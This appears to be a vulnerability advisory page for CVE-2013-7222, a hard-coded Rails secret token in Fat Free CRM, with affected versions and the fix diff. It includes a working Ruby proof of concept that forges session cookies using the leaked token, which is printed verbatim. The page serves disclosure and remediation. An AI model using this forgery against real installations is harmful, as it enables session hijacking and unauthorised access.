VYPR
Moderate severity · NVD Advisory · Published Jan 2, 2014 · Updated Apr 29, 2026

CVE-2013-7222

Description

config/initializers/secret_token.rb in Fat Free CRM before 0.12.1 ships with a fixed, hard-coded FatFreeCRM::Application.config.secret_token value. Because that key is public in the source code, a remote attacker can sign cookies (the session cookie included) that a default installation accepts as genuine, simply by reusing the key from the repository.
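The following is an added example, not Fat Free CRM's own code, showing the mechanism described above end to end. It re-implements with only the Ruby standard library the cookie format Rails 3 signs with config.secret_token through ActiveSupport::MessageVerifier (base64 of a Marshal-serialized value, two dashes, hex HMAC-SHA1 of that payload), forges a session cookie with the token that appears verbatim in the shipped initializer, and shows that a default install accepts it while an install that generated its own random token rejects it. The session hash (`'user_id' => 1`) and the helper names are constructed for the example; they do not model Fat Free CRM's real session layout.

```ruby
require 'openssl'
require 'securerandom'

# Added example, not Fat Free CRM's own code: a stdlib-only re-implementation
# of the cookie format Rails 3 signs with config.secret_token via
# ActiveSupport::MessageVerifier, i.e.
#   "<base64(Marshal.dump(value))>--<hex HMAC-SHA1(secret, base64 payload)>".
# Whoever can read the repository can mint cookies the app accepts as genuine.

# The constant that shipped in config/initializers/secret_token.rb before
# 0.12.1 (copied from the fix diff on this page).
LEAKED_SECRET_TOKEN =
  '51aa366864a80316a85cff0d3762347f4ae3d029d548bef034d56e82b1a2ffac' \
  '5353ee6719d9b64e4354e2a0b1a901679f46a851c360a2ea377188e4b196b6b6'

class SignedCookie
  def initialize(secret)
    @secret = secret
  end

  # Serialize, base64-encode (pack 'm0' is strict base64) and sign a value.
  def generate(value)
    data = [Marshal.dump(value)].pack('m0')
    "#{data}--#{digest(data)}"
  end

  # Return the cookie's value if the signature verifies, nil otherwise.
  # Marshal.load only runs on data whose HMAC matched; with a public secret
  # that check is no protection at all, which is the whole point of the CVE.
  def verify(cookie)
    data, sig = cookie.to_s.split('--', 2)
    return nil if data.nil? || sig.nil?
    return nil unless secure_compare(digest(data), sig)
    Marshal.load(data.unpack1('m0'))
  end

  private

  def digest(data)
    OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), @secret, data)
  end

  # Constant-time comparison so the verifier does not leak the expected digest.
  def secure_compare(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

# Attacker side: with the secret in a public repo, forging a session for any
# user is one HMAC call. The session hash is constructed for this example.
def forge_session_cookie(secret, user_id)
  SignedCookie.new(secret).generate('user_id' => user_id)
end

# Server side: does a deployment running with +server_secret+ accept the cookie?
def server_accepts?(server_secret, cookie)
  !SignedCookie.new(server_secret).verify(cookie).nil?
end

# What the fix amounts to: a per-deployment random token (the patched rake
# task also uses SecureRandom.hex(64)).
def fresh_secret
  SecureRandom.hex(64)
end

# Default install (leaked token) versus an install with its own token.
def demo
  forged = forge_session_cookie(LEAKED_SECRET_TOKEN, 1)
  {
    accepted_by_default_install: server_accepts?(LEAKED_SECRET_TOKEN, forged),
    accepted_by_patched_install: server_accepts?(fresh_secret, forged),
    forged_user_id: SignedCookie.new(LEAKED_SECRET_TOKEN).verify(forged)['user_id']
  }
end

puts demo if $PROGRAM_NAME == __FILE__
```

Running the file prints a hash in which the forged cookie is accepted by the default install and rejected by the one with a fresh token. Note that rotating to a random token is the only remedy: the HMAC itself is sound, so no amount of hardening on the verification side helps while the key is public.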

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                    Affected versions    Patched versions
fat_free_crm (RubyGems)    < 0.12.1             0.12.1

Affected products

  • cpe:2.3:a:fatfreecrm:fat_free_crm:*:*:*:*:*:*:*:* (range: <= 0.12.0)
  • cpe:2.3:a:fatfreecrm:fat_free_crm:0.9.6:*:*:*:*:*:*:*
  • cpe:2.3:a:fatfreecrm:fat_free_crm:0.9.7:*:*:*:*:*:*:*
  • cpe:2.3:a:fatfreecrm:fat_free_crm:0.9.8:*:*:*:*:*:*:*
  • cpe:2.3:a:fatfreecrm:fat_free_crm:0.9.9:*:*:*:*:*:*:*
  • cpe:2.3:a:fatfreecrm:fat_free_crm:0.9.10:*:*:*:*:*:*:*
  • cpe:2.3:a:fatfreecrm:fat_free_crm:0.10.1:*:*:*:*:*:*:*
  • cpe:2.3:a:fatfreecrm:fat_free_crm:0.11.0:*:*:*:*:*:*:*
  • cpe:2.3:a:fatfreecrm:fat_free_crm:0.11.1:*:*:*:*:*:*:*
  • cpe:2.3:a:fatfreecrm:fat_free_crm:0.11.2:*:*:*:*:*:*:*

Patches

93c182dd4c6f

Strengthen case to generate unique secret token.

https://github.com/fatfreecrm/fat_free_crm · Steve Kenworthy · Dec 27, 2013 · via GHSA
2 files changed · +28 −4
  • config/initializers/secret_token.rb (+11 −4, modified)
    @@ -3,16 +3,23 @@
     # Fat Free CRM is freely distributable under the terms of MIT license.
     # See MIT-LICENSE file or http://www.opensource.org/licenses/mit-license.php
     #------------------------------------------------------------------------------
    +
     # Be sure to restart your server when you modify this file.
     
    -# Your secret key for verifying the integrity of signed cookies.
    +# Your secret key is used for verifying the integrity of signed cookies.
     # If you change this key, all old signed cookies will become invalid!
    +
     # Make sure the secret is at least 30 characters and all random,
     # no regular words or you'll be exposed to dictionary attacks.
    +# You can use `rake secret` to generate a secure secret key.
     
    -# PLEASE NOTE: This secret token must be changed in your fork of Fat Free CRM.
    -# This problem is mitigated when running Fat Free CRM as a Rails Engine.
    +# Make sure your secret_key_base is kept private
    +# if you're sharing your code publicly.
     
     if defined?(FatFreeCRM::Application)
    -  FatFreeCRM::Application.config.secret_token = '51aa366864a80316a85cff0d3762347f4ae3d029d548bef034d56e82b1a2ffac5353ee6719d9b64e4354e2a0b1a901679f46a851c360a2ea377188e4b196b6b6'
    +  if Rails.env == 'test'
    +    FatFreeCRM::Application.config.secret_token = '51aa366864a80316a85cff0d3762347f4ae3d029d548bef034d56e82b1a2ffac5353ee6719d9b64e4354e2a0b1a901679f46a851c360a2ea377188e4b196b6b6'
    +  else
    +    raise "Please run 'rake ffcrm:secret' to generate a secret token."
    +  end
     end
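Review bot: the guidance in this hunk contradicts itself: the new comment says "You can use `rake secret` to generate a secure secret key", but the raise at the bottom tells operators to run `rake ffcrm:secret`, and only the latter (added in this commit) writes the initializer; `rake secret` merely prints a value. Point the comment at `rake ffcrm:secret`, and change `secret_key_base` in the new comment to `secret_token`, since that is the setting this file actually configures. Two further points. The leaked 128-hex-character token is kept verbatim in the `Rails.env == 'test'` branch, so any box that is ever started with RAILS_ENV=test still accepts cookies signed with the public key; a random value (`SecureRandom.hex(64)`, as the new rake task does) would serve the test suite equally well and remove the known constant from the tree entirely. And because the task overwrites this whole file with a single assignment, the `if defined?(FatFreeCRM::Application)` guard and all of these comments vanish after the first run; having the task write to a separate file that this initializer loads would keep the shipped code intact and make future upgrades of this file conflict-free.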
    
  • lib/tasks/ffcrm/secret.rake (+17 −0, added)
    @@ -0,0 +1,17 @@
    +# Copyright (c) 2008-2013 Michael Dvorkin and contributors.
    +#
    +# Fat Free CRM is freely distributable under the terms of MIT license.
    +# See MIT-LICENSE file or http://www.opensource.org/licenses/mit-license.php
    +#------------------------------------------------------------------------------
    +
    +namespace :ffcrm do
    +
    +  desc "Generate a secret token for Rails to use."
    +  task :secret do
    +    require 'securerandom'
    +    secret = SecureRandom.hex(64)
    +    filename = File.join(Rails.root, 'config', 'initializers', 'secret_token.rb')
    +    File.open(filename, 'w'){|f| f.puts "FatFreeCRM::Application.config.secret_token = '#{secret}'"}
    +  end
    +
    +end
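Review bot: `File.open(filename, 'w')` creates the file with the process umask (typically 0644), leaving the freshly generated secret world-readable, and it silently overwrites any token already present, which invalidates every existing signed cookie without warning. Pass an explicit mode, `File.open(filename, 'w', 0600)`, and abort (or require an explicit force flag) when the file already contains a non-placeholder `secret_token` assignment. Also note that the task has no `=> :environment` prerequisite, and must not get one: loading the environment on a fresh install would trip the `raise` in the patched initializer before any token exists, so a comment here should say why the prerequisite is absent. Lastly, the generated line drops the `if defined?(FatFreeCRM::Application)` guard that the shipped initializer carries; emitting the same guarded form would keep the two versions of the file consistent.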
    
